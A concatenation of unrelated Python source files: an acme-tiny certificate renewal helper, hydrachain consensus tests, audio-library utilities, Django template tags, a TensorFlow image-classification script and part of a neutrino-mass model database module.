LOGGER.debug(validity_limit)
difference = validity_limit-now
self.validity_in_days = difference.days
except TypeError:
LOGGER.info("Can't parse {}".format(self.filename))
LOGGER.info(self.not_after)
raise
def check_validity(self):
return self.validity_in_days < self.validity_need
class CertificateManager():
def __init__(self, config_filename='/etc/acme-tiny/config.yaml',
dry_run=False, staging=False, show=False, validity_need=30,
generate=False):
self.need_to_generate = []
self.need_to_regenerate = []
self.need_to_restart = []
self.certificates = {}
self.show = show
self.validity_need = validity_need
self.dry_run = dry_run
self.staging = staging
self.generate = generate
self.load_config_file(config_filename)
self.acme_tiny = ACMETiny(self.config['acme'],
dry_run=self.dry_run,
staging=self.staging)
if self.dry_run:
LOGGER.info('Run in dry mode')
if self.show:
LOGGER.info('Certificate(s) information:')
self.load_certificates_config()
self.parse_certificates()
self.show_or_generate()
self.show_or_regenerate()
def load_config_file(self, config_filename):
stream = open(config_filename)
self.config = yaml.load(stream)
self.services = self.config['services']
self.acme = self.config['acme']
def load_certificates_config(self):
self.certificates_path = self.config.get('certificates',
{}).get('path')
for certificate_path in glob.glob(self.certificates_path):
stream = open(certificate_path)
certificate = yaml.load(stream)
for key in certificate.keys():
self.certificates[key] = certificate[key]
def parse_certificates(self):
for cn in self.certificates:
cert_path = self.acme['cert_path'].format(cn)
if os.path.isfile(cert_path):
cert_info = X509Parser(cert_path,
validity_need=self.validity_need,
generate=self.generate)
if self.show:
LOGGER.info(cert_info)
if cert_info.check_validity():
services_to_restart = self.certificates[cn]['restart']
self.need_to_regenerate.append(cn)
for service in services_to_restart:
if service not in self.need_to_restart:
self.need_to_restart.append(service)
else:
self.need_to_generate.append(cn)
def show_or_generate(self):
if self.show:
if len(self.need_to_generate) > 0:
LOGGER.info('\nNeed to generate certificate(s):')
LOGGER.info('\n'.join(self.need_to_generate))
else:
for certificate in self.need_to_generate:
self.bootstrap(certificate)
def show_or_regenerate(self):
if self.show:
if len(self.need_to_regenerate) > 0:
LOGGER.info('\nNeed to regenerate certificate(s):')
LOGGER.info('\n'.join(self.need_to_regenerate))
LOGGER.info('\nNeed to restart service(s) after regeneration:')
LOGGER.info('\n'.join(self.need_to_restart))
else:
for certificate in self.need_to_regenerate:
self.regenerate(certificate)
for service in self.need_to_restart:
self.restart(service)
def restart(self, service):
cmd = self.services[service]
LOGGER.info('Launch: {}'.format(cmd))
if not self.dry_run:
os.system(cmd)
def bootstrap(self, certificate):
LOGGER.info('Generate {}'.format(certificate))
key_filename = self.acme['priv_path'].format(certificate)
csr_filename = self.acme['request_path'].format(certificate)
crt_filename = self.acme['cert_path'].format(certificate)
pem_filename = self.acme['chain_pem_path'].format(certificate)
root_dir = os.path.dirname(key_filename)
if not os.path.isdir(root_dir):
LOGGER.info('Need to create {}'.format(root_dir))
os.mkdir(root_dir, mode=0o750)
if not os.path.isfile(key_filename):
cmd = self.acme['cmd_priv_key'].format(key_filename)
LOGGER.info(cmd)
os.system(cmd)
if not os.path.isfile(csr_filename):
cmd = self.acme['cmd_csr'].format(key_filename, certificate,
csr_filename)
LOGGER.info(cmd)
os.system(cmd)
if not os.path.isfile(crt_filename):
cmd = self.acme['cmd_self_sign'].format(csr_filename, crt_filename,
key_filename)
LOGGER.info(cmd)
os.system(cmd)
if not os.path.isfile(pem_filename):
cmd = self.acme['cmd_self_sign'].format(csr_filename, pem_filename,
key_filename)
LOGGER.info(cmd)
os.system(cmd)
def regenerate(self, certificate):
LOGGER.info('Regenerate {}'.format(certificate))
self.acme_tiny.sign_certificate(certificate)
class ACMETiny():
def __init__(self, config, dry_run=False, staging=False):
self.config = config
self.install_or_update()
acme_path = self.config['tiny_path']
if acme_path not in sys.path:
sys.path.append(acme_path)
import acme_tiny
self.dry_run = dry_run
self.staging = staging
self.acme_tiny = acme_tiny
self.check_ca()
if self.dry_run or self.staging:
LOGGER.info('!!!Use LE staging!!!')
self.ca = 'https://acme-staging.api.letsencrypt.org'
else:
self.ca = acme_tiny.DEFAULT_CA
def install_or_update(self):
acme_path = self.config['tiny_path']
if os.path.isdir(acme_path):
cmd = 'cd {} ; git pull'.format(acme_path)
LOGGER.debug(cmd)
os.system(cmd)
else:
LOGGER.debug('Need to create {}'.format(acme_path))
root_dir = os.path.dirname(acme_path)
LOGGER.debug('Git clone in {}'.format(root_dir))
cmd = 'cd {} ; git clone --depth 1 {}'.format(root_dir, AT_GIT_URL)
LOGGER.debug(cmd)
os.system(cmd)
cron_path = self.config['cron_filename']
if not os.path.isfile(cron_path):
LOGGER.info('Need to create {}'.format(cron_path))
cron = '{} {} * * * root '
cron += '/usr/local/acme_helper/acme_helper.py '
cron += '>> /var/log/acme_tiny.log 2>&1\n'
cron = cron.format(
random.randrange(0, 59),
random.randrange(0, 23)
)
LOGGER.info(cron)
with open(cron_path, 'w') as stream:
stream.write(cron)
def check_ca(self):
existing_ca = False
need_to_update_ca = False
if os.path.isfile(self.config['intermediate_certs']):
existing_ca = True
fhash = hashlib.sha1()
fhash.update(''.join(
open(self.config['intermediate_certs']).readlines()).encode())
else:
LOGGER.info('Need to download')
need_to_update_ca = True
r = requests.get(self.config['intermediate_url'])
intermediate_ca_content = r.text
self.ca_content = intermediate_ca_content
# Downloaded hash
dhash = hashlib.sha1()
dhash.update(intermediate_ca_content.encode())
if existing_ca:
size_match = fhash.digest_size == dhash.digest_size
hex_match = fhash.hexdigest() == dhash.hexdigest()
if size_match and hex_match:
need_to_update_ca = False
else:
need_to_update_ca = True
if need_to_update_ca:
LOGGER.info('Update {}'.format(self.config['intermediate_certs']))
if not self.dry_run:
with open(self.config['intermediate_certs'], 'w') as stream:
stream.write(intermediate_ca_content)
def sign_certificate(self, certificate):
csr_filename = self.config['request_path'].format(certificate)
crt_filename = self.config['cert_path'].format(certificate)
chain_pem_filename = self.config['chain_pem_path'].format(certificate)
signed_crt = self.acme_tiny.get_crt(self.config['key'],
csr_filename,
self.config['chalenge_path'],
log=LOGGER,
CA=self.ca)
if not self.dry_run:
with open(crt_filename, 'w') as stream:
stream.write(signed_crt)
with open(chain_pem_filename, 'w') as stream:
stream.write(signed_crt+self.ca_content)
def main(argv):
help_text = '''\
This script automates the let's encrypt certificates with:
https://github.com/diafygi/acme-tiny
'''
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description=textwrap.dedent(help_text)
)
parser.add_argument('--quiet', action='store_const', const=logging.ERROR,
help='suppress output except for errors')
parser.add_argument('--dry', action='store_const', const=True,
help='Launch in dry mode (in staging LE environnement)'
)
parser.add_argument('--generate', action='store_const', const=True,
help='Generate missing certificate'
)
parser.add_argument('--debug', action='store_const', const=True,
help='Launch in debug mode'
)
parser.add_argument('--show', action='store_const', const=True,
help='Only show certificate informations'
)
parser.add_argument('--staging', action='store_const', const=True,
help='Use LE staging (for tests)'
)
parser.add_argument('--day', default=30,
help='Certificate validity days before regenerate them'
)
args = parser.parse_args(argv)
LOGGER.setLevel(args.quiet or args.debug or LOGGER.level)
LOGGER.info('==== Started at {}'.format(datetime.utcnow()))
CertificateManager(dry_run=args.dry, validity_need=int(args.day),
show=args.show, staging=args.staging,
generate=args.generate)
LOGGER.info('==== Finished at {}'.format(datetime.utcnow()))
if __name__ == '__main__': # pragma: no cover
main(sys.argv[1:])
|
<gh_stars>100-1000
# from hydrachain import protocol
from hydrachain.consensus.base import Vote, VoteBlock, VoteNil, LockSet, ishash, Ready
from hydrachain.consensus.base import DoubleVotingError, InvalidVoteError, MissingSignatureError
from hydrachain.consensus.base import BlockProposal, genesis_signing_lockset, InvalidProposalError
from hydrachain.consensus.base import Proposal, VotingInstruction, InvalidSignature, Signed
from ethereum import utils, tester
import rlp
import pytest
privkey = 'x' * 32
def test_signed():
s = Signed(v=0, r=0, s=0)
assert s.sender is None
with pytest.raises(MissingSignatureError):
s.hash
s.sign(privkey)
sender = s.sender
h = s.hash
s.v = 0 # change signature, in order to test signature independend hash
assert s.sender == sender
assert s.hash == h
def test_vote():
h, r = 2, 3
bh = '0' * 32
sender = utils.privtoaddr(privkey)
v = Vote(h, r)
v2 = Vote(h, r, blockhash=bh)
assert isinstance(v, Vote)
assert isinstance(v2, Vote)
assert isinstance(v, VoteNil)
assert isinstance(v, rlp.Serializable)
assert isinstance(v2, VoteBlock)
v.sign(privkey)
s = v.sender
assert s == sender
v2.sign(privkey)
assert v2.sender == sender
# encode
assert len(v.get_sedes()) == len(v.fields) == 6
vs = rlp.encode(v)
assert isinstance(vs, bytes)
print rlp.decode(vs)
vd = rlp.decode(vs, Vote)
assert isinstance(vd, VoteNil)
assert vd.blockhash == ''
assert vd == v
v2s = rlp.encode(v2)
v2d = rlp.decode(v2s, Vote)
assert isinstance(v2d, VoteBlock)
assert v2d.blockhash == bh
assert v2d == v2
assert v != v2
assert vd != v2d
assert len(set((v, vd))) == 1
assert len(set((v2, v2d))) == 1
assert len(set((v, vd, v2, v2d))) == 2
privkeys = [chr(i) * 32 for i in range(1, 11)]
validators = [utils.privtoaddr(p) for p in privkeys]
def test_ready():
ls = LockSet(num_eligible_votes=len(privkeys))
s = Ready(0, current_lockset=ls)
assert s.current_lockset == ls
s.sign(privkey)
s0 = Ready(0, current_lockset=ls)
s0.sign(privkey)
s1 = Ready(1, current_lockset=ls)
s1.sign(privkey)
assert s == s0
assert s != s1
def test_LockSet():
ls = LockSet(num_eligible_votes=len(privkeys))
assert not ls
assert len(ls) == 0
bh = '0' * 32
r, h = 2, 3
v1 = VoteBlock(h, r, bh)
# add not signed
with pytest.raises(InvalidVoteError):
ls.add(v1)
assert not ls
assert v1 not in ls
# add signed
v1.sign(privkeys[0])
ls.add(v1)
assert ls
assert len(ls) == 1
lsh = ls.hash
ls.add(v1)
assert lsh == ls.hash
assert len(ls) == 1
# second vote same sender
v2 = VoteBlock(h, r, bh)
v2.sign(privkeys[0])
ls.add(v1)
ls.add(v2)
assert lsh == ls.hash
assert len(ls) == 1
# third vote
v3 = VoteBlock(h, r, bh)
v3.sign(privkeys[1])
ls.add(v1)
ls.add(v3)
assert lsh != ls.hash
assert len(ls) == 2
assert v3 in ls
lsh = ls.hash
# vote wrong round
v4 = VoteBlock(h, r + 1, bh)
v4.sign(privkeys[2])
with pytest.raises(InvalidVoteError):
ls.add(v4)
assert lsh == ls.hash
assert len(ls) == 2
assert v4 not in ls
# vote twice
v3_2 = VoteBlock(h, r, blockhash='1' * 32)
v3_2.sign(privkeys[1])
with pytest.raises(DoubleVotingError):
ls.add(v3_2)
assert lsh == ls.hash
assert len(ls) == 2
assert v3_2 not in ls
def test_one_vote_lockset():
ls = LockSet(num_eligible_votes=1)
bh = '0' * 32
r, h = 2, 3
v1 = VoteBlock(h, r, bh)
v1.sign(privkeys[0])
ls.add(v1)
assert ls.has_quorum
def test_LockSet_isvalid():
ls = LockSet(num_eligible_votes=len(privkeys))
bh = '0' * 32
r, h = 2, 3
votes = [VoteBlock(h, r, bh) for i in range(len(privkeys))]
for i, v in enumerate(votes):
v.sign(privkeys[i])
ls.add(v)
assert len(ls) == i + 1
if len(ls) < ls.num_eligible_votes * 2 / 3.:
assert not ls.is_valid
else:
assert ls.is_valid
assert ls.has_quorum # same blockhash
ls.check()
def test_LockSet_3_quorums():
ls = LockSet(3)
v = VoteBlock(0, 0, '0' * 32)
v.sign(privkeys[0])
ls.add(v)
v = VoteNil(0, 0)
v.sign(privkeys[1])
ls.add(v)
assert len(ls) == 2
assert not ls.is_valid
v = VoteNil(0, 0)
v.sign(privkeys[2])
ls.add(v)
assert ls.is_valid
assert ls.has_noquorum
assert not ls.has_quorum
assert not ls.has_quorum_possible
assert ls.check()
def test_LockSet_quorums():
combinations = dict(has_quorum=[
[1] * 7,
[1] * 7 + [2] * 3,
[1] * 7 + [None] * 3,
],
has_noquorum=[
[1] * 3 + [2] * 3 + [None],
[None] * 7,
[None] * 10,
range(10),
range(7)
],
has_quorum_possible=[
[1] * 4 + [None] * 3,
[1] * 4 + [2] * 4,
[1] * 4 + [2] * 3 + [3] * 3,
[1] * 6 + [2]
])
r, h = 1, 2
for method, permutations in combinations.items():
for set_ in permutations:
assert len(set_) >= 7
ls = LockSet(len(privkeys))
for i, p in enumerate(set_):
if p is not None:
bh = chr(p) * 32
v = VoteBlock(h, r, bh)
else:
v = VoteNil(h, r)
v.sign(privkeys[i])
ls.add(v)
assert len(ls) >= 7
assert getattr(ls, method)
ls.check()
# check stable sort
bhs = ls.blockhashes()
if len(bhs) > 1:
assert ishash(bhs[0][0])
assert isinstance(bhs[0][1], int)
if bhs[0][1] == bhs[1][1]:
assert bhs[0][0] > bhs[1][0]
else:
assert bhs[0][1] > bhs[1][1]
# test serialization
s = rlp.encode(ls)
d = rlp.decode(s, LockSet)
assert ls == d
assert id(ls) != id(d)
assert getattr(ls, method) == getattr(d, method)
def test_blockproposal():
s = tester.state()
# block 1
s.mine(n=1)
genesis = s.blocks[0]
assert genesis.header.number == 0
blk1 = s.blocks[1]
assert blk1.header.number == 1
gls = genesis_signing_lockset(genesis, privkeys[0])
bp = BlockProposal(height=1, round=0, block=blk1, signing_lockset=gls, round_lockset=None)
assert bp.lockset == gls
assert isinstance(bp, Proposal)
bp.sign(tester.k0)
with pytest.raises(InvalidProposalError): # round >0 needs round_lockset
bp = BlockProposal(height=1, round=1, block=blk1, signing_lockset=gls, round_lockset=None)
bp.validate_votes(validators, validators[:1])
# block 2
s.mine(n=1)
blk2 = s.blocks[2]
assert blk2.header.number == 2
ls = LockSet(len(validators))
for privkey in privkeys:
v = VoteBlock(height=1, round=0, blockhash=blk1.hash)
v.sign(privkey)
ls.add(v)
bp = BlockProposal(height=2, round=0, block=blk2, signing_lockset=ls, round_lockset=None)
assert bp.lockset == ls
with pytest.raises(InvalidProposalError): # signature missing
bp.validate_votes(validators, validators)
with pytest.raises(InvalidProposalError):
bp.sign(privkeys[0]) # privkey doesnt match coinbase
bp.validate_votes(validators, validators)
with pytest.raises(InvalidSignature): # already signed
bp.sign(tester.k0)
bp.v = 0 # reset sigcheck hack
bp.sign(tester.k0)
bp.validate_votes(validators, validators)
with pytest.raises(InvalidProposalError): # round >0 needs round_lockset
bp = BlockProposal(height=2, round=1, block=blk2, signing_lockset=gls, round_lockset=None)
# block 2 round 1, timeout in round=0
rls = LockSet(len(validators))
for privkey in privkeys:
v = VoteNil(height=2, round=0)
v.sign(privkey)
rls.add(v)
bp = BlockProposal(height=2, round=1, block=blk2, signing_lockset=ls, round_lockset=rls)
assert bp.lockset == rls
bp.sign(tester.k0)
bp.validate_votes(validators, validators)
# serialize
s = rlp.encode(bp)
dbp = rlp.decode(s, BlockProposal)
assert dbp.block == blk2
dbp.validate_votes(validators, validators)
# check quorumpossible lockset failure
rls = LockSet(len(validators))
for i, privkey in enumerate(privkeys):
if i < 4:
v = VoteBlock(height=2, round=0, blockhash='0' * 32)
else:
v = VoteNil(height=2, round=0)
v.sign(privkey)
rls.add(v)
assert not rls.has_noquorum
assert rls.has_quorum_possible
with pytest.raises(InvalidProposalError): # NoQuorum necessary R0
bp = BlockProposal(height=2, round=1, block=blk2, signing_lockset=ls, round_lockset=rls)
def test_VotingInstruction():
rls = LockSet(len(validators))
bh = '1' * 32
for i, privkey in enumerate(privkeys):
if i < 4: # quorum possible
v = VoteBlock(height=2, round=0, blockhash=bh)
else:
v = VoteNil(height=2, round=0)
v.sign(privkey)
rls.add(v)
assert rls.has_quorum_possible
bp = VotingInstruction(height=2, round=1, round_lockset=rls)
bp.sign(privkeys[0])
assert bh == bp.blockhash
# noquorum
rls = LockSet(len(validators))
for i, privkey in enumerate(privkeys):
if i < 3: # noquorum possible
v = VoteBlock(height=2, round=0, blockhash=bh)
else:
v = VoteNil(height=2, round=0)
v.sign(privkey)
rls.add(v)
assert not rls.has_quorum_possible
assert rls.has_noquorum
with pytest.raises(InvalidProposalError): # QuorumPossiblle necessary R0
bp = VotingInstruction(height=2, round=1, round_lockset=rls)
# noquorum
rls = LockSet(len(validators))
for i, privkey in enumerate(privkeys):
if i < 3: # noquorum possible
v = VoteBlock(height=2, round=0, blockhash=bh)
else:
v = VoteNil(height=2, round=0)
v.sign(privkey)
rls.add(v)
assert not rls.has_quorum_possible
assert rls.has_noquorum
with pytest.raises(InvalidProposalError): # QuorumPossiblle necessary R0
bp = VotingInstruction(height=2, round=1, round_lockset=rls)
|
<filename>clamm/util.py
""" utils
"""
import os
import sys
import time
import inspect
import subprocess
import colorama
from clamm import config
SPLIT_REGEX = '&\s*|,\s*|;\s*| - |:\s*|/\s*| feat. | and '
ARTIST_TAG_NAMES = ["ALBUMARTIST_CREDIT",
"ALBUM ARTIST",
"ARTIST",
"ARTIST_CREDIT",
"ALBUMARTIST"]
SEC_PER_DAY = 60*60*24
def commit_to_libfile(tagfile):
"""common entry point for writing values from tag database into
an audiofile.
"""
# check if differences (or newness) exists
n_delta_fields, n_tracks_updated = 0, 0
for k, _ in tagfile.tags.items():
is_new = k not in tagfile.tag_copy.keys()
if not is_new:
is_dif = tagfile.tags[k][0] != tagfile.tag_copy[k][0]
if is_new or is_dif:
n_delta_fields += 1
# short-circuit if no changes to be made
if n_delta_fields == 0:
return (n_tracks_updated, n_delta_fields)
n_tracks_updated += 1
# prompted or automatic write
if config["database"]["require_prompt_when_committing"]:
printr("Proposed: ")
pretty_dict(sorted(tagfile.tags))
if not input("Accept? [y]/n: "):
tagfile.save()
else:
tagfile.save()
printr(
lambda: [
sys.stdout.write(
colorama.Fore.RED + "." + colorama.Fore.WHITE),
sys.stdout.flush()])
return (n_tracks_updated, n_delta_fields)
def pretty_dict(d):
for k, v in d.items():
print("\t{}: {}".format(k, v))
def printr(func_or_msg, verbosic_precedence=3, caller=True):
"""a utility that enables callers to simplify printing behavior.
Args:
func_or_msg: Either a function handle to call or a message string
to print.
Kwargs:
verbosic_precedence: Integer setting verbosity level.
If not set, the message is printed if the config value
`verbosity` is higher than the default value.
The caller can short-circuit the config value by setting
the kwarg.
caller: Bool indicating whether or not to print the caller name.
"""
if int(config["verbosity"]) > verbosic_precedence:
return
caller_name = ""
if caller:
caller_name = inspect.stack()[1][3]
if isinstance(func_or_msg, unicode) or isinstance(func_or_msg, str):
print("\n" +
colorama.Fore.BLUE + caller_name +
colorama.Fore.WHITE + ": " + func_or_msg)
else:
func_or_msg()
def start_shairport(filepath):
"""make sure no duplicate processes and start up shairport-sync
"""
subprocess.Popen(['killall', 'shairport-sync'])
time.sleep(1)
with open(filepath, "w") as fptr:
subprocess.Popen(
['shairport-sync', '-o=stdout'], stdout=fptr)
printr("shairport up and running.")
def pcm2wav(pcm_name, wav_name):
subprocess.call(
["ffmpeg", "-hide_banner", "-y", "-f",
"s16le", "-ar", "44.1k", "-ac", "2", "-i", pcm_name, wav_name])
def wav2flac(wav_name):
"""utility for using ``ffmpeg`` to convert a wav file to a flac file
"""
subprocess.call(
["ffmpeg", "-hide_banner", "-y", "-i",
wav_name, wav_name.replace(".wav", ".flac")])
def generate_playlist(artist, album):
""" generate_playlist """
sed_program = 's/SEARCHTERM/"{} {}"/g'.format(
artist, album).replace(":", "").replace("&", "")
osa_prog = os.path.join(config["path"]["osa"], "program.js")
osa_temp = os.path.join(config["path"]["osa"], "template.js")
with open(osa_prog, "w") as osa:
subprocess.Popen(['sed', sed_program, osa_temp], stdout=osa)
subprocess.Popen(['osascript', osa_prog])
class SimpleState(object):
def __init__(self, filepath):
self.count = 0
self.filepath = filepath
def get_state(self, state):
""" return the file size, sampled with a 1 second gap to
determine if the file is being written to.
"""
init_size = os.path.getsize(self.filepath)
time.sleep(1)
last_size = os.path.getsize(self.filepath)
self.count += 2
if self.count % 60 == 0:
sys.stdout.write(".")
sys.stdout.flush()
if state == "finishd":
return last_size == init_size
elif state == "startd":
return last_size > init_size
def is_audio_file(name):
"""readability short-cut for testing whether file contains a known
audio file extension as defined in ``config["file"]["known_types"]``
"""
return os.path.splitext(name)[1] in config["file"]["known_types"]
class StructuredQuery():
def __init__(self, querystr):
self.query = querystr
self.keys = [key for key in self.query
if key in config["playlist"]["tag_keys"]]
relations = [key for key in self.query
if key in config["playlist"]["relations"]]
self.operators = [key for key in self.query
if key in config["playlist"]["operators"]]
self.tag_vals = [key for key in self.query if
key not in self.keys and
key not in relations and
key not in self.operators]
self.filters = [{self.keys[i]: self.tag_vals[i], "rel": relations[i]}
for i in range(len(self.operators) + 1)]
if not self.operators:
self.operators.append("AND")
def __repr__(self):
return str(["{}".format(filt) for filt in self.filters])
|
<filename>boilerplate/templatetags/boilerplate.py
# -*- coding: utf-8 -*-
from django import template
from django.contrib.admin.utils import NestedObjects
try:
from django.urls import reverse
except ImportError:
from django.core.urlresolvers import reverse
from django.db import DEFAULT_DB_ALIAS
from django.utils.text import slugify
from ..boilerplate import get_boilerplate_setting
register = template.Library()
URL_LIST_SUFFIX = get_boilerplate_setting('model_url_list_suffix', '_list')
APP_URL_INDEX = get_boilerplate_setting('app_url_index', 'home')
@register.simple_tag
def url_replace(request, field, value):
dict_ = request.GET.copy()
dict_[field] = str(value)
return dict_.urlencode()
@register.filter
def get_deleted_objects(object):
"""
List the related objects before delete an object
"""
collector = NestedObjects(using=DEFAULT_DB_ALIAS)
collector.collect([object])
return collector.nested()
"""
Form filters
"""
@register.filter
def form_model_name(value):
"""
Return the model verbose name of a form model
"""
try:
return value._meta.model._meta.verbose_name
except Exception:
return value.__class__.__name__
@register.filter
def form_model_name_plural(value):
"""
Return the model verbose name plural of a form model
"""
return value._meta.model._meta.verbose_name_plural
@register.filter
def form_model_url(value):
"""
Return the model list url name of a form model
"""
return (
value._meta.model._meta.app_label +
':' +
value._meta.model.__name__.lower() +
URL_LIST_SUFFIX
)
@register.filter
def form_app_name(value):
"""
Return the app name of a form model
"""
return value._meta.model._meta.app_config.verbose_name
@register.filter
def form_app_url(value):
"""
Return the app home url of a form model
"""
return value._meta.model._meta.app_label.lower() + ':' + APP_URL_INDEX
@register.filter
def form_prefix(value):
"""
Return the form name as a prefix
"""
return slugify(value.__class__.__name__.lower())
@register.filter
def formset_model_name(value):
"""
Return the model verbose name of a formset
"""
try:
return value.model._meta.verbose_name
except AttributeError:
return str(value.__class__.__name__)
@register.filter
def formset_model_name_plural(value):
"""
Return the model verbose name plural of a formset
"""
try:
return value.model._meta.verbose_name_plural
except AttributeError:
return str(value.__class__.__name__)
"""
Model filters
"""
@register.simple_tag
def model_action(value, action):
"""
**Tag name**
::
model_action
Return the full url name of an action
**Usage**
::
{% model_action object action %}
**Example**
::
{% model_action object 'update' %}
"""
name = (
value._meta.model._meta.app_label +
':' +
value._meta.model.__name__.lower() +
"_" +
action
)
return reverse(name, args=(value.pk,))
@register.simple_tag
def model_child_action(value, parent, action):
"""
**Tag name**
::
model_child_action
Return the full url name of an action
**Usage**
::
{% model_child_action object parent action %}
**Example**
::
{% model_child_action object parent 'update' %}
"""
name = (
parent._meta.model._meta.app_label +
':' +
parent._meta.model.__name__.lower() +
"_" +
value._meta.model.__name__.lower() +
"_" +
action
)
return reverse(name, args=(parent.pk, value.pk,))
@register.filter
def model_name(value):
"""
Return the model verbose name of an object
"""
return value._meta.verbose_name
@register.filter
def model_name_plural(value):
"""
Return the model verbose name plural of an object
"""
return value._meta.verbose_name_plural
@register.filter
def model_app_name(value):
"""
Return the app verbose name of an object
"""
return value._meta.app_config.verbose_name
@register.filter
def model_app_url(value):
"""
Return the app home url of an object
"""
return (
value._meta.app_label.lower().replace(" ", "_") +
':' +
APP_URL_INDEX
)
@register.filter
def model_url(value):
"""
Return the model list url name of a model
"""
return (
value._meta.model._meta.app_label +
':' +
value._meta.model.__name__.lower() +
URL_LIST_SUFFIX
)
"""
Queryset filters
"""
@register.filter
def queryset_app_name(value):
"""
Return the app verbose name of a queryset
"""
return value.model._meta.app_config.verbose_name
@register.filter
def queryset_app_url(value):
"""
Return the app home url name of a queryset
"""
return value.model._meta.app_label.lower() + ':' + APP_URL_INDEX
@register.filter
def queryset_model_name_plural(value):
"""
Return the app verbose name plural of a queryset
"""
return value.model._meta.verbose_name_plural
@register.filter
def queryset_model_url(value):
"""
Return the model list url name of a queryset
"""
return (
value.model._meta.app_label.lower() +
':' +
value.model.__name__.lower() +
URL_LIST_SUFFIX
)
@register.simple_tag
def queryset_action(value, action):
"""
**Tag name**
::
queryset_action
Return the full url name of an action
**Parameters**:
:queryset: A valid queryset of objects
:action: A valid action name. Ex. namespace:model_action
**Usage**
::
{% queryset_action queryset action %}
**Example**
::
{% queryset_action queryset 'add' %}
"""
name = (
value.model._meta.app_label +
':' +
value.model.__name__.lower() +
"_" +
action
)
return reverse(name)
|
<gh_stars>1-10
# Copyright 2019 ChangyuLiu Authors. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from models import *
from dataset import get_label_name
import tensorflow as tf
import matplotlib.pyplot as plt
from PIL import Image
import argparse
parser = argparse.ArgumentParser('Prediction mnist label')
parser.add_argument('--path', type=str,
help='Image path, best input abs path. `./datasets/cat.png`')
parser.add_argument('--height', type=int, default=224,
help='Image height. default: 224')
parser.add_argument('--width', type=int, default=224,
help='Image width. default: 224')
parser.add_argument('--channels', type=int, default=3,
help='Image color RBG. default: 3')
parser.add_argument('--classes', type=int, default=2,
help="Classification picture type. default: 2")
parser.add_argument('--checkpoint_dir', '--dir', type=str, default='training_checkpoint',
help="Model save path.")
parser.add_argument('--dis', type=bool, default=False,
help='display matplotlib? default: False.')
args = parser.parse_args()
label_names = get_label_name()
label_names = label_names.features['label'].int2str
base_model = MobileNetV2(include_top=False,
input_shape=(args.height, args.width, args.channels),
weights='imagenet',
classes=args.classes)
avg_pool = tf.keras.layers.GlobalAveragePooling2D()
fc = tf.keras.layers.Dense(args.classes,
activation=tf.nn.softmax,
name='Logits')
model = tf.keras.Sequential([
base_model,
avg_pool,
fc
])
def process_image(image, height=args.height, width=args.width):
""" process image ops.
Args:
image: 'input tensor'.
height: 'int64' img height.
width: 'int64' img width.
Returns:
tensor
"""
# read img to string.
image = tf.io.read_file(image)
# decode png to tensor
image = tf.image.decode_image(image, channels=3)
# convert image to float32
image = tf.cast(image, tf.float32)
# image norm.
image = image / 255.
# image resize model input size.
image = tf.image.resize(image, (height, width))
return image
def prediction(image):
""" prediction image label.
Args:
image: 'input tensor'.
Returns:
'int64', label
"""
image = process_image(image)
# Add the image to a batch where it's the only member.
image = (tf.expand_dims(image, 0))
print(f"==========================================")
print(f"Loading model.............................")
checkpoint = tf.train.Checkpoint(model=model)
checkpoint.restore(tf.train.latest_checkpoint(checkpoint_dir=args.checkpoint_dir))
print(f"Load model successful!")
print(f"==========================================")
print(f"Start making predictions about the picture.")
print(f"==========================================")
predictions = model(image)
classes = int(tf.argmax(predictions[0]))
print(f"Label is : {label_names(classes)}")
if args.dis:
image = Image.open(args.path)
plt.figure(figsize=(4, 4))
plt.xticks([])
plt.yticks([])
plt.grid(False)
plt.imshow(image, cmap='gray')
plt.xlabel(label_names(classes))
plt.show()
if __name__ == '__main__':
prediction(args.path)
|
#!/usr/bin/env python3
from neutrinomass.tensormethod import D, L, Q, H, eb, ub, db, eps, delta
from neutrinomass.tensormethod.core import IndexedField, Field
from neutrinomass.completions.topologies import Leaf
from neutrinomass.completions.core import (
EffectiveOperator,
Completion,
cons_completion_field,
)
from neutrinomass.utils.functions import conjugate_field, conjugate_term
from neutrinomass.database.utils import subsets
from functools import reduce
import operator
from networkx import Graph
from collections import defaultdict
import time
from typing import Dict, List
import re
import math
import numpy as np
from sympy import prime
from sympy.ntheory import factorint
from itertools import groupby
import os
from glob import glob
import pandas as pd
import pickle
ExoticField = cons_completion_field
def match(pattern: str, data: str):
return re.match(pattern, data)
def matches_in(pattern, coll):
for x in coll:
if match(pattern, x):
return True
return False
def Partition(*args):
return tuple(args)
class LazyCompletion:
def __init__(self, head: dict, tail: str):
"""head is a dict with essential information about completion. For complete
completion, call `force` method.
"""
self.head = head
self.tail = tail
assert "quantum_numbers" in self.head
assert "operator_name" in self.head
# assert "operator_dimension" in self.head
def force(self):
return eval(self.tail)
@property
def quantum_numbers(self):
return set(self.head["quantum_numbers"])
@property
def operator_name(self):
return self.head["operator_name"]
def contains_field(self, pattern):
return matches_in(pattern, self.quantum_numbers)
def contains_interaction(self, patterns):
"""This probably needs to be rewritten recursively"""
interactions = self.head["terms"]
for interaction in interactions:
is_match = True
for pattern in patterns:
is_match = is_match and bool(matches_in(pattern, interaction))
if is_match:
return True
return False
# @property
# def operator_dimension(self):
# return self.head["operator_dimension"]
def read_completions(filename: str):
"""Do this as a context manager?"""
completions = defaultdict(list)
with open(filename, "r") as f:
line = f.readline()
while line:
comp = eval(line)
completions[comp.operator_name].append(comp)
line = f.readline()
return completions
class ModelDataFrame(pd.DataFrame):
_metadata = [
"exotics",
"terms",
"exotic2int",
"int2exotic",
"term2int",
"int2term",
]
@property
def _constructor(self):
return ModelDataFrame
@classmethod
def new(cls, data, exotics, terms):
df = cls(data)
df.exotic2int = {k: v for k, v in exotics.items()}
df.int2exotic = {v: k for k, v in exotics.items()}
df.exotics = {**df.exotic2int, **df.int2exotic}
df.term2int = {k: v for k, v in terms.items()}
df.int2term = {v: k for k, v in terms.items()}
df.terms = {**df.term2int, **df.int2term}
return df
def completion(self, index: int) -> Completion:
return eval(self["completion"][index])
def related_models(self, index: int) -> "ModelDataFrame":
demo_num = self["democratic_num"][index]
factor_groups = [l for l in subsets(factorint(demo_num)) if len(l) > 1]
indices = []
for group in factor_groups:
